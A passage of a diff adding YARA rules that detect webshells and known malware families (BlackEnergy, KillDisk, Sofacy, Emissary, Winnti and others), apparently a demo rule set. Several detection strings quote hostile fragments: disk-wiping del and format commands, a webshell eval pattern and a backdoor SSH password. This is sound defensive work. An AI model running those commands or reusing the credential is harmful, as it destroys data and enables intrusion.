+      description = "Detects Webshell Acid"
+      author = "Florian Roth"
+      reference = "https://github.com/nikicat/web-malware-collection"
+      date = "2016-01-11 13:37:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+      hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+      hash3 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">Delete</option>\";" fullword ascii
+      $s1 = "if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}" fullword ascii
+   condition: 
+      filesize < 900KB and all of them
+}
+
+rule Webshell_r57shell_2b_RID2E8F : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects Webshell R57"
+      author = "Florian Roth"
+      reference = "https://github.com/nikicat/web-malware-collection"
+      date = "2016-01-11 11:19:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
+      hash2 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
+      hash3 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$connection = @ftp_connect($ftp_server,$ftp_port,10);" fullword ascii
+      $s2 = "echo $lang[$language.'_text98'].$suc.\"\\r\\n\";" fullword ascii
+   condition: 
+      filesize < 900KB and all of them
+}
+
+rule Webshell_zehir_RID2CC8 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects Webshell - rule generated from from files elmaliseker.asp, zehir.asp, zehir.txt, zehir4.asp, zehir4.txt"
+      author = "Florian Roth"
+      reference = "https://github.com/nikicat/web-malware-collection"
+      date = "2016-01-11 10:03:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218"
+      hash2 = "0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6"
+      hash3 = "cb9d5427a83a0fc887e49f07f20849985bd2c3850f272ae1e059a08ac411ff66"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';" fullword ascii
+      $s2 = "if (frmUpload.max.value<=0) frmUpload.max.value=1;" fullword ascii
+   condition: 
+      filesize < 200KB and 1 of them
+}
+
+rule Webshell_c99_4_RID2C0E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects C99 Webshell"
+      author = "Florian Roth"
+      reference = "https://github.com/nikicat/web-malware-collection"
+      date = "2016-01-11 09:32:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+      hash2 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+      hash3 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "displaysecinfo(\"List of Attributes\",myshellexec(\"lsattr -a\"));" fullword ascii
+      $s2 = "displaysecinfo(\"RAM\",myshellexec(\"free -m\"));" fullword ascii
+      $s3 = "displaysecinfo(\"Where is perl?\",myshellexec(\"whereis perl\"));" fullword ascii
+      $s4 = "$ret = myshellexec($handler);" fullword ascii
+      $s5 = "if (posix_kill($pid,$sig)) {echo \"OK.\";}" fullword ascii
+   condition: 
+      filesize < 900KB and 1 of them
+}
+
+rule BlackEnergy_Driver_USBMDM_RID304A : APT DEMO EXE FILE {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
+      date = "2016-01-04 12:33:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094"
+      hash2 = "b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a"
+      hash3 = "edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "USB MDM Driver" fullword wide
+      $s2 = "KdDebuggerNotPresent" fullword ascii
+      $s3 = "KdDebuggerEnabled" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 180KB and all of them
+}
+
+rule BlackEnergy_Driver_AMDIDE_RID3026 : APT DEMO EXE FILE {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
+      date = "2016-01-04 12:27:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614"
+      hash2 = "3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2"
+      hash3 = "90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = " AMD IDE driver" fullword wide
+      $s2 = "SessionEnv" fullword wide
+      $s3 = "\\DosDevices\\{C9059FFF-1C49-4445-83E8-" wide
+      $s4 = "\\Device\\{C9059FFF-1C49-4445-83E8-" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 150KB and all of them
+}
+
+rule BlackEnergy_VBS_Agent_RID2EF0 : APT DEMO SCRIPT {
+   meta:
+      description = "Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs"
+      author = "Florian Roth"
+      reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+      date = "2016-01-03 11:35:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "WshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, false" fullword ascii
+      $s1 = "WshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"" fullword ascii
+      $s2 = "Set WshShell = CreateObject(\"WScript.Shell\")" fullword ascii
+   condition: 
+      filesize < 1KB and 2 of them
+}
+
+rule DropBear_SSH_Server_RID2E43 : APT DEMO EXE FILE T1021 {
+   meta:
+      description = "Detects DropBear SSH Server (not a threat but used to maintain access)"
+      author = "Florian Roth"
+      reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+      date = "2016-01-03 11:07:01"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, T1021"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.html" fullword ascii
+      $s2 = "Badly formatted command= authorized_keys option" fullword ascii
+      $s3 = "This Dropbear program does not support '%s' %s algorithm" fullword ascii
+      $s4 = "/etc/dropbear/dropbear_dss_host_key" fullword ascii
+      $s5 = "/etc/dropbear/dropbear_rsa_host_key" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+}
+
+rule BlackEnergy_BackdoorPass_DropBear_SSH_RID352E : APT DEMO EXE FILE T1021 {
+   meta:
+      description = "Detects the password of the backdoored DropBear SSH Server - BlackEnergy"
+      author = "Florian Roth"
+      reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+      date = "2016-01-03 16:02:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, T1021"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "passDs5Bu9Te7" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and $s1
+}
+
+rule BlackEnergy_KillDisk_1_RID2F5E : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects KillDisk malware from BlackEnergy"
+      author = "Florian Roth"
+      reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+      date = "2016-01-03 11:54:11"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
+      hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
+      hash3 = "c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "system32\\cmd.exe" fullword ascii
+      $s1 = "system32\\icacls.exe" fullword wide
+      $s2 = "/c del /F /S /Q %c:\\*.*" fullword ascii
+      $s3 = "shutdown /r /t %d" fullword ascii
+      $s4 = "/C /Q /grant " fullword wide
+      $s5 = "%08X.tmp" fullword ascii
+      $s6 = "/c format %c: /Y /X /FS:NTFS" fullword ascii
+      $s7 = "/c format %c: /Y /Q" fullword ascii
+      $s8 = "taskhost.exe" fullword wide
+      $s9 = "shutdown.exe" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 8 of them
+}
+
+rule BlackEnergy_KillDisk_2_RID2F5F : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects KillDisk malware from BlackEnergy"
+      author = "Florian Roth"
+      reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+      date = "2016-01-03 11:54:21"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
+      hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
+      hash3 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "%c:\\~tmp%08X.tmp" fullword ascii
+      $s1 = "%s%08X.tmp" fullword ascii
+      $s2 = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide
+      $s3 = "%ls_%ls_%ls_%d.~tmp" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 3 of them
+}
+
+rule Emissary_APT_Malware_1_RID2F5A : APT DEMO EXE FILE MAL T1085 {
+   meta:
+      description = "Detects Emissary Malware - from samples A08E81B411.DAT, ishelp.dll"
+      author = "Florian Roth"
+      reference = "http://goo.gl/V0epcf"
+      date = "2016-01-02 11:53:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab"
+      hash2 = "70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629"
+      hash3 = "0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cmd.exe /c %s > %s" fullword ascii
+      $s2 = "execute cmd timeout." fullword ascii
+      $s3 = "rundll32.exe \"%s\",Setting" fullword ascii
+      $s4 = "DownloadFile - exception:%s." fullword ascii
+      $s5 = "CDllApp::InitInstance() - Evnet create successful." fullword ascii
+      $s6 = "UploadFile - EncryptBuffer Error" fullword ascii
+      $s7 = "WinDLL.dll" fullword wide
+      $s8 = "DownloadFile - exception:%s,code:0x%08x." fullword ascii
+      $s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" fullword ascii
+      $s10 = "CDllApp::InitInstance() - Evnet already exists." fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 250KB and 3 of them
+}
+
+rule WebShell_PHP_Web_Kit_v3_RID2F7A : DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Detects PAS Tool PHP Web Kit"
+      author = "Florian Roth"
+      reference = "https://github.com/wordfence/grizzly"
+      date = "2016-01-01 11:58:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $php = "<?php $" 
+      $php2 = "@assert(base64_decode($_REQUEST[" 
+      $s1 = "(str_replace(\"\\n\", '', '" 
+      $s2 = "(strrev($" ascii
+      $s3 = "de'.'code';" ascii
+   condition: 
+      ( ( uint32 ( 0 ) == 0x68703f3c and $php at 0 ) or $php2 ) and filesize > 8KB and filesize < 100KB and all of ( $s* )
+}
+
+rule WebShell_PHP_Web_Kit_v4_RID2F7B : DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Detects PAS Tool PHP Web Kit"
+      author = "Florian Roth"
+      reference = "https://github.com/wordfence/grizzly"
+      date = "2016-01-01 11:59:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $php = "<?php $" 
+      $s1 = "(StR_ReplAcE(\"\\n\",''," 
+      $s2 = ";if(PHP_VERSION<'5'){" ascii
+      $s3 = "=SuBstr_rePlACe(" ascii
+   condition: 
+      uint32 ( 0 ) == 0x68703f3c and $php at 0 and filesize > 8KB and filesize < 100KB and 2 of ( $s* )
+}
+
+rule Derusbi_Code_Signing_Cert_RID30D4 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects an executable signed with a certificate also used for Derusbi Trojan - suspicious"
+      author = "Florian Roth"
+      reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
+      date = "2015-12-15 12:56:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Fuqing Dawu Technology Co.,Ltd.0" fullword ascii
+      $s2 = "XL Games Co.,Ltd.0" fullword ascii
+      $s3 = "Wemade Entertainment co.,Ltd0" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and 1 of them
+}
+
+rule XOR_4byte_Key_RID2BD9 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)"
+      author = "Florian Roth"
+      reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
+      date = "2015-12-15 09:24:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = { 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 900KB and all of them
+}
+
+rule Sofacy_Malware_StrangeSpaces_RID3230 : APT DEMO EXE FILE G0007 MAL RUSSIA {
+   meta:
+      description = "Detetcs strange strings from Sofacy malware with many spaces"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+      date = "2015-12-04 13:54:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0007, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "Delete Temp Folder Service                                  " fullword wide
+      $s3 = " Operating System                        " fullword wide
+      $s4 = "Microsoft Corporation                                       " fullword wide
+      $s5 = " Microsoft Corporation. All rights reserved.               " fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 50KB and 3 of them
+}
+
+rule Sofacy_Malware_AZZY_Backdoor_1_RID325F : APT DEMO EXE FILE G0007 MAL RUSSIA {
+   meta:
+      description = "AZZY Backdoor - Sample 1"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+      date = "2015-12-04 14:02:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0007, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "advstorshell.dll" fullword wide
+      $s1 = "advshellstore.dll" fullword ascii
+      $s2 = "Windows Advanced Storage Shell Extension DLL" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
+}
+
+rule Sofacy_AZZY_Backdoor_HelperDLL_RID3242 : APT DEMO EXE FILE G0007 MAL RUSSIA {
+   meta:
+      description = "Dropped C&C helper DLL for AZZY 4.3"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+      date = "2015-12-04 13:57:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0007, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "snd.dll" fullword ascii
+      $s1 = "InternetExchange" fullword ascii
+      $s2 = "SendData" 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+
+rule Sofacy_CollectorStealer_Gen1_RID31F6 : APT DEMO EXE FILE G0007 GEN MAL RUSSIA {
+   meta:
+      description = "Generic rule to detect Sofacy Malware Collector Stealer"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+      date = "2015-12-04 13:44:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4e4606313c423b681e11110ca5ed3a2b2632ec6c556b7ab9642372ae709555f3"
+      hash2 = "92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f"
+      tags = "APT, DEMO, EXE, FILE, G0007, GEN, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "NvCpld.dll" fullword ascii
+      $s1 = "NvStop" fullword ascii
+      $s2 = "NvStart" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule Sofacy_CollectorStealer_Gen2_RID31F7 : APT DEMO EXE FILE G0007 GEN RUSSIA {
+   meta:
+      description = "File collectors / USB stealers - Generic"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+      date = "2015-12-04 13:45:01"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0007, GEN, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "msdetltemp.dll" fullword ascii
+      $s2 = "msdeltemp.dll" fullword wide
+      $s3 = "Delete Temp Folder Service" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+}
+
+rule Sofacy_CollectorStealer_Gen3_RID31F8 : APT DEMO EXE FILE G0007 GEN RUSSIA {
+   meta:
+      description = "File collectors / USB stealers - Generic"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+      date = "2015-12-04 13:45:11"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0007, GEN, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "NvCpld.dll" fullword ascii
+      $s4 = "NvStart" fullword ascii
+      $s5 = "NvStop" fullword ascii
+      $a1 = "%.4d%.2d%.2d%.2d%.2d%.2d%.2d%.4d" fullword wide
+      $a2 = "IGFSRVC.dll" fullword wide
+      $a3 = "Common User Interface" fullword wide
+      $a4 = "igfsrvc Module" fullword wide
+      $b1 = " Operating System                        " fullword wide
+      $b2 = "Microsoft Corporation                                       " fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 150KB and ( all of ( $s* ) and ( all of ( $a* ) or all of ( $b* ) ) )
+}
+
+rule PHISH_02Dez2015_dropped_p0o6543f_RID312C : DEMO EXE FILE MAL T1193 T1203 {
+   meta:
+      description = "Phishing Wave - file p0o6543f.exe"
+      author = "Florian Roth"
+      reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
+      date = "2015-12-02 13:11:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "netsh.exe" fullword wide
+      $s2 = "routemon.exe" fullword wide
+      $s3 = "script=" fullword wide
+      $s4 = "disconnect" fullword wide
+      $s5 = "GetClusterResourceTypeKey" fullword ascii
+      $s6 = "QueryInformationJobObject" fullword ascii
+      $s7 = "interface" fullword wide
+      $s8 = "connect" fullword wide
+      $s9 = "FreeConsole" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 250KB and all of them
+}
+
+rule PHISH_02Dez2015_attach_P_ORD_C_10156_124658_RID3397 : DEMO FILE MAL T1193 T1203 {
+   meta:
+      description = "Phishing Wave - file P-ORD-C-10156-124658.xls"
+      author = "Florian Roth"
+      reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
+      date = "2015-12-02 14:54:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, MAL, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Execute" ascii
+      $s2 = "Process WriteParameterFiles" fullword ascii
+      $s3 = "WScript.Shell" fullword ascii
+      $s4 = "STOCKMASTER" fullword ascii
+      $s5 = "InsertEmailFax" ascii
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and filesize < 200KB and all of them
+}
+
+rule Fareit_Trojan_Oct15_RID2E24 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Fareit Trojan from Sep/Oct 2015 Wave"
+      author = "Florian Roth"
+      reference = "http://goo.gl/5VYtlU"
+      date = "2015-10-18 11:01:51"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "230ca0beba8ae712cfe578d2b8ec9581ce149a62486bef209b04eb11d8c088c3"
+      hash2 = "3477d6bfd8313d37fedbd3d6ba74681dd7cb59040cabc2991655bdce95a2a997"
+      hash3 = "408fa0bd4d44de2940605986b554e8dab42f5d28a6a525b4bc41285e37ab488d"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ebai.exe" fullword wide
+      $s2 = "Origina" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and $s1 in ( 0 .. 30000 ) and $s2 in ( 0 .. 30000 )
+}
+
+rule Upatre_Hazgurut_RID2D3B : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Upatre malware dropped by Downloader - file hazgurut.exe"
+      author = "Florian Roth"
+      reference = "https://weankor.vxstream-sandbox.com/sample/6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3?environmentId=7"
+      date = "2015-10-13 10:23:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7ee0d20b15e24b7fe72154d9521e1959752b4e9c20d2992500df9ac096450a50"
+      hash2 = "79ffc620ddb143525fa32bc6a83c636168501a4a589a38cdb0a74afac1ee8b92"
+      hash3 = "62d8a6880c594fe9529158b94a9336179fa7a3d3bf1aa9d0baaf07d03b281bd3"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "barcod" fullword ascii
+      $s0 = "msports.dll" fullword ascii
+      $s1 = "nddeapi.dll" fullword ascii
+      $s2 = "glmf32.dll" fullword ascii
+      $s3 = "<requestedExecutionLevel level=\"requireAdministrator\" uiAccess=\"false\">" fullword ascii
+      $s4 = "cmutil.dll" fullword ascii
+      $s5 = "mprapi.dll" fullword ascii
+      $s6 = "glmf32.dll" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1500KB and $a1 in ( 0 .. 4000 ) and all of ( $s* )
+}
+
+rule Winnti_signing_cert_RID2EE5 : APT CHINA DEMO EXE FILE G0044 MAL {
+   meta:
+      description = "Detects a signing certificate used by the Winnti APT group"
+      author = "Florian Roth"
+      reference = "https://securelist.com/analysis/publications/72275/i-am-hdroot-part-1/"
+      date = "2015-10-10 11:34:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a9a8dc4ae77b1282f0c8bdebd2643458fc1ceb3145db4e30120dd81676ff9b61"
+      hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
+      tags = "APT, CHINA, DEMO, EXE, FILE, G0044, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Guangzhou YuanLuo Technology Co." ascii
+      $s2 = "Guangzhou YuanLuo Technology Co.,Ltd" ascii
+      $s3 = "$Asahi Kasei Microdevices Corporation0" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
+}
+
+rule Indetectables_RAT_RID2D8E : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux"
+      author = "Florian Roth"
+      reference = "http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/"
+      date = "2015-10-01 10:36:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105"
+      hash2 = "66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229"
+      hash3 = "1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Coded By M3" fullword wide
+      $s2 = "Stub Undetector M3" fullword wide
+      $s3 = "www.webmenegatti.com.br" wide
+      $s4 = "M3n3gatt1" fullword wide
+      $s5 = "TheMisterFUD" fullword wide
+      $s6 = "KillZoneKillZoneKill" fullword ascii
+      $s7 = "[[__M3_F_U_D_M3__]]$" fullword ascii
+      $s8 = "M3_F_U_D_M3" ascii
+      $s9 = "M3n3gatt1hack3r" fullword wide
+      $s10 = "M3n3gatt1hack3r" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and 1 of them
+}
+
+rule BergSilva_Malware_RID2DB8 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects a malware from the same author as the Indetectables RAT"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2015-10-01 10:43:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "00e175cbad629ee118d01c49c11f3d8b8840350d2dd6d16bd81e47ae926f641e"
+      hash2 = "6b4cbbee296e4a0e867302f783d25d276b888b1bf1dcab9170e205d276c22cfc"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "C:\\Users\\Berg Silva\\Desktop\\" wide
